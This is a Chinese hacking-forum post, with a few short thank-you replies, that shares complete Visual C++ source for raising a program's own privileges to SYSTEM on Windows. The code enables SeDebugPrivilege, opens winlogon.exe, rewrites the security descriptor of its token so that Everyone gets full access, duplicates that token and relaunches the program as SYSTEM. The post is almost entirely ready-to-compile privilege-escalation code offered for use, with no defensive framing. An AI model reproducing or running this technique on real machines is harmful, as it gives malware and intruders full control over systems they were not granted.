[分享] VC++ 提升自身权限为system

[复制链接]
  • TA的每日心情
    奋斗
    2013-10-21 17:20
  • 签到天数: 13 天

    [LV.3]八品县丞

    15

    主题

    66

    回帖

    224

    积分

    [INTOHARD]排长

    Rank: 3Rank: 3

    积分
    224
    发表于 2012-4-16 12:49:18 | 显示全部楼层 |阅读模式
    #include "stdafx.h"
    #include <windows.h>
    #include <tlhelp32.h>
    #include <Psapi.h>
    #pragma comment(lib,"Psapi.lib")
    #include "Shellapi.h"
    #include <TLHELP32.H>
    #include <aclapi.h>

    int ProcessExit(LPCTSTR szProcName,int x)
    {
    PROCESSENTRY32 pe;
    DWORD dwRet;
    BOOL bFound = FALSE;
    HANDLE hProcess;
    char fileName[1024] = {0};
    HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSP)
    {
      pe.dwSize = sizeof(pe);
      
      for (dwRet = Process32First(hSP, &pe);
      dwRet;
      dwRet = Process32Next(hSP, &pe))
      {
       if(x){
        if (lstrcmpi( szProcName, pe.szExeFile) == 0)
        {
         bFound = TRUE;
         break;
        }
       }
       else
        {
        hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE,pe.th32ProcessID);
        if(hProcess)
        {
         Sleep(1);
         GetModuleFileNameEx(hProcess,NULL, (LPSTR)fileName,sizeof(fileName));
         Sleep(1);
         if (lstrcmpi( szProcName, fileName) == 0)
         {
          bFound = TRUE;
          break;
         }
        }
         CloseHandle(hProcess);
       }
      }
      CloseHandle(hSP);
    }
    return bFound;
    }

    typedef HANDLE (WINAPI *CreateMutexAT)

    (
    __in_opt LPSECURITY_ATTRIBUTES lpMutexAttributes,
    __in     BOOL bInitialOwner,
    __in_opt LPCSTR lpName
    );


    BOOL
    EnableDebugPriv( LPCTSTR szPrivilege )
    {
    HANDLE hToken;
    LUID sedebugnameValue;
    TOKEN_PRIVILEGES tkp;

    if ( !OpenProcessToken( GetCurrentProcess(),
      TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
      &hToken ) )
    {
      return FALSE;
    }
    if ( !LookupPrivilegeValue( NULL, szPrivilege, &sedebugnameValue ) )
    {
      CloseHandle( hToken );
      return FALSE;
    }

    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = sedebugnameValue;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if ( !AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
    {
      CloseHandle( hToken );
      return FALSE;
    }

    return TRUE;
    }


    DWORD
    GetProcessId( LPCTSTR szProcName )
    {
    PROCESSENTRY32 pe;  
    DWORD dwPid;
    DWORD dwRet;
    BOOL bFound = FALSE;

    //
    // 通过 TOOHLP32 函数枚举进程
    //

    HANDLE hSP = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    if ( hSP )
    {
      pe.dwSize = sizeof( pe );
      
      for ( dwRet = Process32First( hSP, &pe );
      dwRet;
      dwRet = Process32Next( hSP, &pe ) )
      {
       //
       // 使用 StrCmpNI 比较字符传,可忽略大小写
       //
       if ( lstrcmpi(szProcName, pe.szExeFile) == 0 )
       {
        dwPid = pe.th32ProcessID;
        bFound = TRUE;
        break;
       }
      }
      
      CloseHandle( hSP );
      
      if ( bFound == TRUE )
      {
       return dwPid;
      }
    }

    return NULL;
    }


    BOOL CreateSystemProcess( LPTSTR szProcessName )
    {
    HANDLE hProcess;
    HANDLE hToken, hNewToken;
    DWORD dwPid;

    PACL pOldDAcl = NULL;
    PACL pNewDAcl = NULL;
    BOOL bDAcl;
    BOOL bDefDAcl;
    DWORD dwRet;

    PACL pSacl = NULL;
    PSID pSidOwner = NULL;
    PSID pSidPrimary = NULL;
    DWORD dwAclSize = 0;
    DWORD dwSaclSize = 0;
    DWORD dwSidOwnLen = 0;
    DWORD dwSidPrimLen = 0;

    DWORD dwSDLen;
    EXPLICIT_ACCESS ea;
    PSECURITY_DESCRIPTOR pOrigSd = NULL;
    PSECURITY_DESCRIPTOR pNewSd = NULL;

    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    BOOL bError;

    if (!EnableDebugPriv("SeDebugPrivilege"))
    {
      bError = TRUE;
      goto Cleanup;
    }

    if ( ( dwPid = GetProcessId("WINLOGON.EXE") ) == NULL )
    {
      bError = TRUE;
      goto Cleanup;
    }

    hProcess = OpenProcess( MAXIMUM_ALLOWED, FALSE, dwPid );
    if ( hProcess == NULL )
    {
      bError = TRUE;
      goto Cleanup;
    }

    if ( !OpenProcessToken( hProcess, READ_CONTROL | WRITE_DAC, &hToken ) )
    {
      bError = TRUE;
      goto Cleanup;
    }

    ZeroMemory( &ea, sizeof( EXPLICIT_ACCESS ) );
    BuildExplicitAccessWithName( &ea,
      "Everyone",
      TOKEN_ALL_ACCESS,
      GRANT_ACCESS,
      0 );

    if ( !GetKernelObjectSecurity( hToken,
      DACL_SECURITY_INFORMATION,
      pOrigSd,
      0,
      &dwSDLen ) )
    {
      
      if ( GetLastError() == ERROR_INSUFFICIENT_BUFFER )
      {
       pOrigSd = ( PSECURITY_DESCRIPTOR ) HeapAlloc( GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        dwSDLen );
       if ( pOrigSd == NULL )
       {
        bError = TRUE;
        goto Cleanup;
       }
       
       if ( !GetKernelObjectSecurity( hToken,
        DACL_SECURITY_INFORMATION,
        pOrigSd,
        dwSDLen,
        &dwSDLen ) )
       {
        bError = TRUE;
        goto Cleanup;
       }
      }
      else
      {
       bError = TRUE;
       goto Cleanup;
      }
    }

    if ( !GetSecurityDescriptorDacl( pOrigSd, &bDAcl, &pOldDAcl, &bDefDAcl ) )
    {
      bError = TRUE;
      goto Cleanup;
    }


    dwRet = SetEntriesInAcl( 1, &ea, pOldDAcl, &pNewDAcl );
    if ( dwRet != ERROR_SUCCESS )
    {
      pNewDAcl = NULL;
      
      bError = TRUE;
      goto Cleanup;
    }

    if ( !MakeAbsoluteSD( pOrigSd,
      pNewSd,
      &dwSDLen,
      pOldDAcl,
      &dwAclSize,
      pSacl,
      &dwSaclSize,
      pSidOwner,
      &dwSidOwnLen,
      pSidPrimary,
      &dwSidPrimLen ) )
    {
      
      if ( GetLastError() == ERROR_INSUFFICIENT_BUFFER )
      {
       pOldDAcl = ( PACL ) HeapAlloc( GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        dwAclSize );
       pSacl = ( PACL ) HeapAlloc( GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        dwSaclSize );
       pSidOwner = ( PSID ) HeapAlloc( GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        dwSidOwnLen );
       pSidPrimary = ( PSID ) HeapAlloc( GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        dwSidPrimLen );
       pNewSd = ( PSECURITY_DESCRIPTOR ) HeapAlloc( GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        dwSDLen );
       
       if ( pOldDAcl == NULL ||
        pSacl == NULL ||
        pSidOwner == NULL ||
        pSidPrimary == NULL ||
        pNewSd == NULL )
       {
        bError = TRUE;
        goto Cleanup;
       }
       
       //
       // 再次调用才可以成功创建新的安全描述符 pNewSd
       // 但新的安全描述符仍然是原访问控制列表 ACL
       //
       if ( !MakeAbsoluteSD( pOrigSd,
        pNewSd,
        &dwSDLen,
        pOldDAcl,
        &dwAclSize,
        pSacl,
        &dwSaclSize,
        pSidOwner,
        &dwSidOwnLen,
        pSidPrimary,
        &dwSidPrimLen ) )
       {
        bError = TRUE;
        goto Cleanup;
       }
      }
      else
      {
       bError = TRUE;
       goto Cleanup;
      }
    }

    if ( !SetSecurityDescriptorDacl( pNewSd, bDAcl, pNewDAcl, bDefDAcl ) )
    {
      bError = TRUE;
      goto Cleanup;
    }

    if ( !SetKernelObjectSecurity( hToken, DACL_SECURITY_INFORMATION, pNewSd ) )
    {
      bError = TRUE;
      goto Cleanup;
    }

    if ( !OpenProcessToken( hProcess, TOKEN_ALL_ACCESS, &hToken ) )
    {
      bError = TRUE;
      goto Cleanup;
    }

    if ( !DuplicateTokenEx( hToken,
      TOKEN_ALL_ACCESS,
      NULL,
      SecurityImpersonation,
      TokenPrimary,
      &hNewToken ) )
    {
      bError = TRUE;
      goto Cleanup;
    }


    ZeroMemory( &si, sizeof( STARTUPINFO ) );
    si.cb = sizeof( STARTUPINFO );

    ImpersonateLoggedOnUser( hNewToken );

    if ( !CreateProcessAsUser( hNewToken,
      NULL,
      szProcessName,
      NULL,
      NULL,
      FALSE,
      NULL, //NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE,
      NULL,
      NULL,
      &si,
      &pi ) )
    {
      bError = TRUE;
      goto Cleanup;
    }

    bError = FALSE;

    Cleanup:
    if ( pOrigSd )
    {
      HeapFree( GetProcessHeap(), 0, pOrigSd );
    }
    if ( pNewSd )
    {
      HeapFree( GetProcessHeap(), 0, pNewSd );
    }
    if ( pSidPrimary )
    {
      HeapFree( GetProcessHeap(), 0, pSidPrimary );
    }
    if ( pSidOwner )
    {
      HeapFree( GetProcessHeap(), 0, pSidOwner );
    }
    if ( pSacl )
    {
      HeapFree( GetProcessHeap(), 0, pSacl );
    }
    if ( pOldDAcl )
    {
      HeapFree( GetProcessHeap(), 0, pOldDAcl );
    }

    CloseHandle( pi.hProcess );
    CloseHandle( pi.hThread );
    CloseHandle( hToken );
    CloseHandle( hNewToken );
    CloseHandle( hProcess );

    if ( bError )
    {
      return FALSE;
    }

    return TRUE;
    }





    int APIENTRY WinMain(HINSTANCE hInstance,
                         HINSTANCE hPrevInstance,
                         LPSTR     lpCmdLine,
                         int       nCmdShow)
    {



    char strInstallModule[MAX_PATH];
    memset(strInstallModule, 0, sizeof(strInstallModule));
    GetModuleFileName(NULL,strInstallModule,sizeof(strInstallModule));

    CreateSystemProcess(strInstallModule);
      Sleep(1000);
      return 0;
    }



    以上是提升自身权限为system

    完整代码 可以提升自己为system
  • TA的每日心情

    2012-9-9 20:41
  • 签到天数: 3 天

    [LV.2]九品芝麻官

    6

    主题

    431

    回帖

    716

    积分

    [INTOHARD]连长

    Rank: 4

    积分
    716
    发表于 2012-9-9 21:12:50 | 显示全部楼层
    想钱钱的疯子!!!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2013-10-23 16:36
  • 签到天数: 130 天

    [LV.7]四品道员

    2

    主题

    514

    回帖

    1004

    积分

    [INTOHARD]营长

    Rank: 6Rank: 6

    积分
    1004
    发表于 2013-7-9 17:41:08 | 显示全部楼层
    多谢分享!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2021-12-12 18:49
  • 签到天数: 1 天

    [LV.1]布衣百姓

    17

    主题

    183

    回帖

    1289

    积分

    [INTOHARD]营长

    Rank: 6Rank: 6

    积分
    1289
    发表于 2013-11-27 18:09:56 | 显示全部楼层
    谢谢分享!
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表